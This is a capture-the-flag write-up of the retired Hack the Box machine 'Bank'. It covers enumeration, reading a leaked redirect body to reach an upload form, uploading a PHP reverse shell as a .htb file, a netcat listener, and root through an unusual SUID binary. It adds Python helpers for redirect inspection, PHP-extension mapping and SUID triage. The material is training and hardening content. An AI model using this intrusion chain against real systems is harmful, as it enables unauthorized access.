
Hack the Box (HTB) Machines Walkthrough Series ― Bank


Continuing with our series on the Hack the Box (HTB) machines, this article contains the walkthrough of another HTB machine. This one is named “Bank.”

HTB is an excellent platform that hosts machines running multiple OSes, along with a number of standalone challenges. Before you can log in, you have to solve a small puzzle (basic enumeration and testing of the signup page); once inside, you can download the VPN pack that connects you to the machines hosted on the HTB network.

Note: Only writeups of retired HTB machines are allowed. The machine in this article, known as “Bank,” is retired.

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Bank machine IP is 10.10.10.29.

3. We will follow the same penetration-testing methodology as in the earlier walkthroughs. Let’s start with enumeration, to gather as much information about the machine as possible.

4. Below is the nmap command used and its output. Three ports are open on this machine: 22 (SSH), 53 (DNS) and 80 (HTTP). Note that DNS is listening on TCP port 53, which is the transport used for zone transfers, so an AXFR request against the server is worth attempting as a way to discover hostnames.

<<nmap -sC -sV -oA nmap 10.10.10.29 >>



5. We’ll start with enumeration of port 80. Browsing to the IP address only returns the default Apache installation page, which suggests the real site is served as a name-based virtual host and needs the correct Host header. At this point the hostname had to be guessed; it turns out to be bank.htb, following the usual HTB convention of <machinename>.htb.



6. In order to resolve it, let’s add the entry in /etc/hosts. The screenshot below depicts the same thing.



7. With the hosts entry in place, browsing to http://bank.htb presents a login page instead of the default Apache page.



8. We tried a few quick things against this login (default and common credentials, basic SQL injection payloads) hoping for an early win, but to no avail. So we go back to enumeration and launch dirbuster to find out whether more directories and pages exist:

Launch dirbuster: <<dirbuster>>

URL: http://bank.htb

Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Extension: php

Start

9. After this, observe the output of dirbuster. An interesting detail is that support.php answers with a 302 redirect, yet the response size is far larger than a bare redirect should be. That usually means the application renders the full page and only then sends the redirect, so the body is there for anyone who reads the raw response.

10. Let’s try to see if we can analyze the support.php page contents before the redirection happens.

11. Start up Burp and enable interception of server responses (Proxy > Options > Intercept Server Responses), as shown below.



12. Let’s request support.php again through the proxy. Now that we hold the response in Burp before the browser acts on the redirect, we can see that support.php serves a complete HTML page along with the 302 status.



13. Sending the same request to Burp’s Repeater, we can see the complete request and response for the support.php page.



14. Opening the loaded html for support.php in the browser presents the page below.



15. To load this in Firefox, we can install the NoRedirect plugin and add the URL hxxp://bank.htb/login.php so that no automatic redirects happen under this URL.



16. With the redirect suppressed, the browser now renders support.php itself, which gives us the ability to upload files.
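The same check done without a browser plugin, as an added example that is not part of the original walkthrough: fetch the page with a client that never follows redirects, keep the body of the 3xx response, and flag any redirect whose body is larger than a bare redirect page should be. So that it runs offline, the target is a constructed local stand-in that mimics what the walkthrough found (a 302 to /login.php sent together with the full page); the form field name fileToUpload and the size threshold are assumptions for illustration. Point fetch_no_redirect() at the real host, with the host argument set to the virtual host name, to use it on an engagement.

```python
"""Read the body that a 302 response carries before the browser discards it."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed stand-in for the vulnerable page: the redirect header is sent,
# but so is the page that should only be reachable after authentication.
LEAKED_FORM = (
    b"<html><body><h1>Support</h1>"
    b'<form method="post" enctype="multipart/form-data">'
    b'<input type="file" name="fileToUpload"><input type="submit"></form>'
    b"</body></html>"
)


class LeakyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/support.php":
            # Page rendered first, redirect issued afterwards, no exit in between.
            self.send_response(302)
            self.send_header("Location", "/login.php")
            self.send_header("Content-Length", str(len(LEAKED_FORM)))
            self.end_headers()
            self.wfile.write(LEAKED_FORM)
        else:
            body = b"<html><body>login</body></html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_stub_server():
    """Start the constructed server on an ephemeral port; return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), LeakyHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def fetch_no_redirect(url, host=None, timeout=5):
    """GET url with http.client, which never follows redirects, and return
    (status, location, body). `host` overrides the Host header, which is what
    a name-based virtual host such as bank.htb keys on."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    conn.request("GET", parts.path or "/", headers={"Host": host or parts.netloc})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location"), body


def suspicious_redirect(status, body, threshold=100):
    """A 3xx whose body exceeds `threshold` bytes deserves a look: a bare
    redirect page is tiny, a leaked application page is not."""
    return 300 <= status < 400 and len(body) > threshold


if __name__ == "__main__":
    base = start_stub_server()
    status, location, body = fetch_no_redirect(base + "/support.php")
    print(status, location, len(body), "bytes")
    if suspicious_redirect(status, body):
        print(body.decode())
```

The size heuristic is the same signal dirbuster gave away: compare the Content-Length of every 301/302/303/307 against what the application's normal redirects look like, and read the raw body of any outlier.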



17. Before we start exploiting the upload feature, looking at the page source reveals an important piece of configuration left behind for debugging: files with the .htb extension are executed as PHP. So rather than fighting whatever filtering applies to .php uploads, we simply upload our PHP code with a .htb extension.
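The general lesson is that the set of extensions a server executes is whatever its handler directives say, not just .php. The following is an added example, not code from the original walkthrough: it parses Apache-style AddType/AddHandler lines into the set of PHP-executable extensions and checks candidate upload names against them. The two config fragments are constructed for illustration; the walkthrough only reports that .htb executes as PHP, not the exact directive the machine used.

```python
"""Which uploaded filenames will the web server execute as PHP?"""
import re
from pathlib import PurePosixPath

# Constructed Apache-style fragments: a debugging mapping left in place (weak)
# and the same server with only the intended extension (hardened).
WEAK_CONFIG = """
AddType application/x-httpd-php .php
# [DEBUG] treat .htb as php so uploads can be tested
AddType application/x-httpd-php .htb
"""
HARDENED_CONFIG = """
AddType application/x-httpd-php .php
"""

DIRECTIVE = re.compile(r"^\s*Add(?:Type|Handler)\s+(\S+)\s+(.+?)\s*$", re.IGNORECASE)


def php_extensions(config_text):
    """Return the extensions (lower-cased, without the dot) that AddType or
    AddHandler map to a PHP type or handler. Simplified: one directive per
    line, '#' comments ignored, no <Directory>/<FilesMatch> scoping."""
    exts = set()
    for line in config_text.splitlines():
        line = line.split("#", 1)[0]
        m = DIRECTIVE.match(line)
        if not m:
            continue
        target, ext_list = m.groups()
        if "php" in target.lower():
            exts.update(e.lstrip(".").lower() for e in ext_list.split())
    return exts


def executes_as_php(filename, php_exts):
    """True if any dot-separated extension in the name is PHP-executable.
    Apache's mod_mime considers every extension in a name, which is why
    'shell.php.jpg' is also checked, not only the last suffix."""
    suffixes = [s.lstrip(".").lower() for s in PurePosixPath(filename).suffixes]
    return any(s in php_exts for s in suffixes)


def upload_names_to_try(base, php_exts):
    """Filenames worth uploading: one per extension the server will execute."""
    return sorted(f"{base}.{ext}" for ext in php_exts)


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        exts = php_extensions(cfg)
        print(label, "executes:", sorted(exts))
        for name in ("shell.php", "shell.htb", "shell.php.jpg", "photo.jpg"):
            print("  ", name, "->", executes_as_php(name, exts))
```

On the defensive side the fix is the hardened fragment plus denying script execution in the upload directory altogether; on the offensive side, pull every extension the configuration maps to PHP before deciding what to upload.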



18. Following the analysis above, we will upload a PHP reverse shell as a .htb file through the support.php page. But before we do that, let’s edit the file so that it connects back to the attacking machine’s IP and port.



19. After making the required changes to the PHP backdoor, the file is saved as shell.htb and uploaded as shown below.



20. Before we browse the uploaded file, let’s start a netcat listener on port 1234.

<<nc -nlvp 1234>>

21. Browsing the uploaded file spawns back the shell, as shown below.



22. The shell comes back as www-data, but that user is allowed to read the home directory of user “chris,” as shown below. The following commands were used to grab the user.txt file.

<< cd chris >>

<< ls >>

<< cat user.txt >>

23. To perform privilege escalation, one of the first things I always check is which binaries have the SUID bit set.

<< find / -perm -u=s -type f 2>/dev/null >>



24. We can see a binary at /var/htb/bin/emergency that has the SUID bit set and is owned by root, in a location where no stock binary lives. Changing into the directory and checking the file type shows it is a 32-bit ELF executable. Upon executing it, we get a shell as root.

<< cd /var/htb/bin >>

<< ls -l >>

<< file emergency >>

<< ./emergency >>

<< id >>
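The SUID check above, written out as an added example that is not part of the original walkthrough: find_suid() is the Python equivalent of the find command, and triage() reduces the list to root-owned SUID files that are not expected on a stock system, flagging the ones in non-standard directories or with loose write permissions. The EXPECTED_SUID baseline and STANDARD_DIRS are assumptions for illustration, not a complete list for any distribution; the sample listing in the demo is constructed.

```python
"""Enumerate SUID binaries and single out the ones worth a closer look."""
import os
import stat

# Assumed baseline: SUID binaries a stock Linux box is expected to carry.
# Anything outside this set is a lead; anything outside the usual bin
# directories (like /var/htb/bin/emergency) is a strong one.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/bin/mount", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
}
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                 "/usr/lib/", "/usr/libexec/")
PSEUDO_FS = ("/proc", "/sys", "/dev")


def find_suid(root="/"):
    """Equivalent of `find / -perm -u=s -type f 2>/dev/null`: yield
    (path, uid, mode) for every regular file with the set-uid bit."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Prune pseudo-filesystems: they are noise and can stall the walk.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable, the 2>/dev/null of the find command
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_uid, st.st_mode


def triage(entries):
    """Given (path, uid, mode) tuples, return [(path, reasons)] for the
    root-owned SUID files that are not in the expected baseline."""
    leads = []
    for path, uid, mode in entries:
        if uid != 0 or path in EXPECTED_SUID:
            continue  # only root-owned SUID files give root; known ones are noise
        reasons = ["unexpected root-owned SUID binary"]
        if not path.startswith(STANDARD_DIRS):
            reasons.append("non-standard location")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("writable by group or others")
        leads.append((path, reasons))
    return leads


if __name__ == "__main__":
    # Constructed listing shaped like the output on this machine.
    sample = [
        ("/usr/bin/passwd", 0, 0o104755),
        ("/var/htb/bin/emergency", 0, 0o104755),
        ("/home/chris/tool", 1000, 0o104755),
    ]
    for path, reasons in triage(sample):
        print(path, "<-", ", ".join(reasons))
    # On a live target: for path, reasons in triage(find_suid("/")): ...
```

A binary that triage() flags still has to be inspected (file, strings, and running it in a controlled way) before anything is concluded; the list only tells you where to look first.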

25. Since we are root now, we’re browsing to get the root.txt file.

<< cd /root >>

<< ls >>

<< cat root.txt >>

So this was another machine from the HTB platform. The interesting lesson from this one is that a 302 response can carry a full page body that the browser never shows; intercepting the response (or fetching it with a client that does not follow redirects) is what exposed the upload form. Privilege escalation was straightforward: a root-owned SUID binary in a non-standard directory.

We will continue this series with more walkthroughs of such machines.

